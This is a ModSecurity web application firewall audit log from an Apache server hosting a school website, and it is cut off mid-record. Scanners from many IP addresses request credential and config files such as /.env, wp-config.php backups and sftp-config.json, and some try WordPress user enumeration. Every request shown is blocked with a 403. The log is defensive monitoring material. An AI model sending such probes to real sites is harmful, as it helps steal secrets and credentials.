[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655489074053 776 (- - -) Stopwatch2: 1749655489074053 776; combined=326, p1=285, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --535f3742-Z-- --3453fc48-A-- [11/Jun/2025:22:41:55 +0700] aEmjw27bf2YTFvcEXPuLXwAAAE8 103.236.140.4 45470 103.236.140.4 8181 --3453fc48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.248.135 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.248.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3453fc48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3453fc48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749656515722546 891 (- - -) Stopwatch2: 1749656515722546 891; combined=371, p1=337, p2=0, p3=0, p4=0, p5=33, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3453fc48-Z-- --09712c74-A-- [11/Jun/2025:23:22:25 +0700] aEmtQQI48YPcPeAOw9tVMAAAABA 103.236.140.4 46344 103.236.140.4 8181 --09712c74-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --09712c74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09712c74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658945292853 936 (- - -) Stopwatch2: 1749658945292853 936; combined=364, p1=321, p2=0, p3=0, p4=0, p5=43, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09712c74-Z-- --7158261b-A-- [11/Jun/2025:23:22:26 +0700] aEmtQm7bf2YTFvcEXPuLhwAAAFg 103.236.140.4 46346 103.236.140.4 8181 --7158261b-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --7158261b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7158261b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658946356331 682 (- - -) Stopwatch2: 1749658946356331 682; combined=259, p1=229, p2=0, p3=0, p4=0, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7158261b-Z-- --13dee754-A-- [11/Jun/2025:23:22:29 +0700] aEmtRQI48YPcPeAOw9tVMQAAABc 103.236.140.4 46348 103.236.140.4 8181 --13dee754-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --13dee754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13dee754-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658949877193 857 (- - -) Stopwatch2: 1749658949877193 857; combined=318, p1=278, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13dee754-Z-- --d87f4d13-A-- [11/Jun/2025:23:22:43 +0700] aEmtU27bf2YTFvcEXPuLigAAAEc 103.236.140.4 46356 103.236.140.4 8181 --d87f4d13-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --d87f4d13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d87f4d13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658963628927 877 (- - -) Stopwatch2: 1749658963628927 877; combined=343, p1=302, p2=0, p3=0, p4=0, p5=41, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d87f4d13-Z-- --928c7512-A-- [11/Jun/2025:23:29:11 +0700] aEmu1wI48YPcPeAOw9tVQgAAAAM 103.236.140.4 46416 103.236.140.4 8181 --928c7512-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.161.118 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.161.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Accept-Charset: utf-8 --928c7512-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --928c7512-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749659351953023 939 (- - -) Stopwatch2: 1749659351953023 939; combined=416, p1=379, p2=0, p3=0, p4=0, p5=37, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --928c7512-Z-- --3a694d4f-A-- [11/Jun/2025:23:33:50 +0700] aEmv7gI48YPcPeAOw9tVUAAAABg 103.236.140.4 46472 103.236.140.4 8181 --3a694d4f-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --3a694d4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a694d4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749659630518801 813 (- - -) Stopwatch2: 1749659630518801 813; combined=325, p1=284, p2=0, p3=0, p4=0, p5=40, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a694d4f-Z-- --44ec1529-A-- [11/Jun/2025:23:36:35 +0700] aEmwkwI48YPcPeAOw9tVWgAAABU 103.236.140.4 46506 103.236.140.4 8181 --44ec1529-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3542.0 Safari/537.36 Accept-Charset: utf-8 --44ec1529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44ec1529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749659795254193 838 (- - -) Stopwatch2: 1749659795254193 838; combined=328, p1=287, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44ec1529-Z-- --0bde5b7c-A-- [11/Jun/2025:23:42:54 +0700] aEmyDtDFbATf6vJlOUt7mwAAAJc 103.236.140.4 46574 103.236.140.4 8181 --0bde5b7c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 Accept-Charset: utf-8 --0bde5b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bde5b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749660174275830 828 (- - -) Stopwatch2: 1749660174275830 828; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bde5b7c-Z-- --110e091b-A-- [11/Jun/2025:23:44:51 +0700] aEmyg27bf2YTFvcEXPuLlQAAAEE 103.236.140.4 46596 103.236.140.4 8181 --110e091b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept-Charset: utf-8 --110e091b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --110e091b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749660291551242 855 (- - -) Stopwatch2: 1749660291551242 855; combined=343, p1=300, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --110e091b-Z-- --16923768-A-- [12/Jun/2025:00:14:31 +0700] aEm5d5P8TulJ-kfHNvEIDQAAANY 103.236.140.4 47022 103.236.140.4 8181 --16923768-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.137.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --16923768-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16923768-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749662071812970 836 (- - -) Stopwatch2: 1749662071812970 836; combined=338, p1=300, p2=0, p3=0, p4=0, p5=38, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16923768-Z-- --8fbd0e16-A-- [12/Jun/2025:00:14:58 +0700] aEm5kgI48YPcPeAOw9tVvwAAAA8 103.236.140.4 47038 103.236.140.4 8181 --8fbd0e16-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.137.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8fbd0e16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fbd0e16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749662098938813 882 (- - -) Stopwatch2: 1749662098938813 882; combined=334, p1=296, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fbd0e16-Z-- --7c6bd334-A-- [12/Jun/2025:00:26:18 +0700] aEm8OpP8TulJ-kfHNvEIPAAAAMU 103.236.140.4 49034 103.236.140.4 8181 --7c6bd334-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.0 Accept-Charset: utf-8 --7c6bd334-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c6bd334-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749662778599284 823 (- - -) Stopwatch2: 1749662778599284 823; combined=324, p1=286, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c6bd334-Z-- --3dd90b61-A-- [12/Jun/2025:01:51:31 +0700] aEnQM5P8TulJ-kfHNvEKqQAAAMs 103.236.140.4 37084 103.236.140.4 8181 --3dd90b61-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3dd90b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dd90b61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749667891174434 812 (- - -) Stopwatch2: 1749667891174434 812; combined=327, p1=287, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dd90b61-Z-- --e12c2679-A-- [12/Jun/2025:02:52:00 +0700] aEneYNDFbATf6vJlOUuEJgAAAIY 103.236.140.4 38506 103.236.140.4 8181 --e12c2679-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.248.148.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.248.148.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e12c2679-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e12c2679-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749671520339078 3171 (- - -) Stopwatch2: 1749671520339078 3171; combined=1388, p1=526, p2=832, p3=0, p4=0, p5=29, sr=133, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e12c2679-Z-- --2a7b4b53-A-- [12/Jun/2025:03:26:02 +0700] aEnmWsCW7vAFWQIjJpx0sgAAAFU 103.236.140.4 39032 103.236.140.4 8181 --2a7b4b53-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 Accept-Charset: utf-8 --2a7b4b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a7b4b53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749673562366706 894 (- - -) Stopwatch2: 1749673562366706 894; combined=313, p1=278, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a7b4b53-Z-- --18406b52-A-- [12/Jun/2025:03:26:18 +0700] aEnmaviOwnjCOc5ARoVWEQAAAAk 103.236.140.4 39038 103.236.140.4 8181 --18406b52-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; MI 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --18406b52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18406b52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749673578787230 1291 (- - -) Stopwatch2: 1749673578787230 1291; combined=534, p1=494, p2=0, p3=0, p4=0, p5=40, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18406b52-Z-- --8a76da77-A-- [12/Jun/2025:04:03:36 +0700] aEnvKKF10OasdbQdujgsGAAAAM4 103.236.140.4 39384 103.236.140.4 8181 --8a76da77-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 Accept-Charset: utf-8 --8a76da77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a76da77-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749675816672488 878 (- - -) Stopwatch2: 1749675816672488 878; combined=384, p1=354, p2=0, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a76da77-Z-- --29d6da26-A-- [12/Jun/2025:04:35:18 +0700] aEn2lqF10OasdbQdujgzEgAAAMU 103.236.140.4 33098 103.236.140.4 8181 --29d6da26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.87.154 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.87.154 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --29d6da26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29d6da26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749677718571020 852 (- - -) Stopwatch2: 1749677718571020 852; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29d6da26-Z-- --6293a004-A-- [12/Jun/2025:04:51:12 +0700] aEn6UKF10OasdbQdujgzLAAAANg 103.236.140.4 33256 103.236.140.4 8181 --6293a004-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: 